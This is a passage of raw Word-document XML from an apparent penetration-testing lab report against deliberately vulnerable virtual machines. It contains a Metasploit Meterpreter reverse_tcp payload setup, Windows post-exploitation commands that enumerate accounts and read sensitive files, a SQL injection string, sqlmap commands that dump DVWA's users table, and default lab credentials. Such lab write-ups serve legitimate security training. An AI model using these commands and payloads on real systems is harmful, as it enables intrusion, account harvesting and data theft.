    <w:p w14:paraId="4537FA5E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F8CC1B1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ForceExploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF591A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A39FDF4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="4DD06CBB" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00104E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3463A973" wp14:editId="6E686F73">
            <wp:extent cx="5731510" cy="2928620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="675948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954452" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2928620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE81BC6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="002327F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37888457" wp14:editId="0B49D74C">
            <wp:extent cx="5731510" cy="3221355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1577876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876318" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3221355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E4C9B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="064D8957" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="679A7677" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00551AAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AD54259" wp14:editId="525F0B99">
            <wp:extent cx="5731510" cy="3191510"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1371274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274602" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3191510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBFA559" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="0024263B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234CE06C" wp14:editId="574A6207">
            <wp:extent cx="5731510" cy="3215005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="589427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427104" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3215005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7237134E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="45EC9E95" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218C8EBA" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284C2BD2" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D39DE40" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000FF141" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="007B5A8D" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B5A8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post-Exploitation (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B5A8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LOLBin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B5A8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> techniques - T1005, T1078):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA70055" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Following SYSTEM shell access, Living-Off-the-Land techniques were used to enumerate the system and locate sensitive files without deploying additional tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C4C626" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F27E71" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">C:\&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp;&amp; ipconfig &amp;&amp; net user &amp;&amp; net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE97857" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">C:\&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /s /b C:\Users\*sensitive* 2&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36BA596E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>C:\&gt; type C:\Users\Administrator\Desktop\customer_data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2605A7CE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Evidence of Success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42035151" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Meterpreter session established as NT AUTHORITY\SYSTEM on Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14537535" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Sensitive dummy data files enumerated and read from Administrator desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C4317E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Local user accounts and group memberships harvested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB944D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>MITRE ATT&amp;CK: T1210 (Exploit Remote Services), T1005 (Data from Local System), T1059.003 (Windows Command Shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E652C89" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="5A6A4016" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="39296E4D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="05793F71" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="17837FC3" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="002B66B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B9F9BBB" wp14:editId="15263213">
            <wp:extent cx="5731510" cy="3192780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="529446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46116" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3192780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC907AD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="7D383549" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="009D6A70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="755BADE9" wp14:editId="592BA786">
            <wp:extent cx="5731510" cy="3193415"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1348328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328163" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3193415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70612F9F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="5B6CDB93" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="7A307722" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00236EF0" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00236EF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00236EF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (VM 3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00236EF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - SQL Injection on OWASP BWA (T1190, T1048)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3057404C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Vulnerability Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4A81A6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">The OWASP Broken Web Applications (BWA) platform hosts multiple deliberately vulnerable web applications. The target application (DVWA - Damn Vulnerable Web Application) contains an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unsanitised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SQL query parameter in its user lookup functionality. The lack of parameterised queries and input validation allows an attacker to inject arbitrary SQL statements, enabling full database enumeration and data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C6F35" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Preconditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14231D0C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Target 192.168.56.102 running Apache with DVWA accessible on port 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E1234" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DVWA security level set to Low (default/misconfigured)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AD1B3F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Attacker has HTTP connectivity to target web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB2F3A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Exploit Method (High Level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644FC146" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">Burp Suite was used to intercept and inspect HTTP requests to the vulnerable parameter. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was subsequently used to automate enumeration of the backend database schema and extract dummy customer data records. Manual injection strings were also tested to confirm the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B68846" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Commands (High Level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F96CA36" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t># Initial manual test in browser URL bar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D838DC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>http://192.168.56.102/dvwa/vulnerabilities/sqli/?id=1' OR '1'='1&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A0F16" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve"># Automated enumeration with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF19D8E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u 'http://192.168.56.102/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/vulnerabilities/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/?id=1' --cookie='PHPSESSID=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XXXX;security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=low' --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C360CE7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u '[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">]' --cookie='[cookie]' -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5099DC39" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u '[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">]' --cookie='[cookie]' -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A25C89" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Evidence of Success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C4C7D7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>• SQL injection confirmed - application returns unexpected data based on injected conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C33554E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">• Full database schema enumerated: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> database, users and guestbook tables identified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485C4EC7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>• User records extracted including usernames and MD5-hashed passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18470009" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>• Data exfiltrated simulating customer database breach scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D927A4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>• MITRE ATT&amp;CK: T1190 (Exploit Public-Facing Application), T1048 (Exfiltration Over Web Service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D2BEA2" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="46E810A9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Code –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD40BFE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>STEP 1 — Open Firefox on Kali and Login to DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DCFEFF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Go to this URL in Firefox:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2F2971" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>http://192.168.56.102/dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555C5B8" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Login with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168EEC74" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="0411D1FF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB1CB6D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>Password: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D5D962" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="140154B4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="005038F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AC69E76" wp14:editId="30BA0C74">
            <wp:extent cx="5731510" cy="3220720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="247061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061563" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3220720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="121B378A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="392E5AD0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="425EA173" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>These Login Combinations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436481FB" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">Username      Password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DB65C9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>admin                password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DC7D33" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t xml:space="preserve">admin                 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
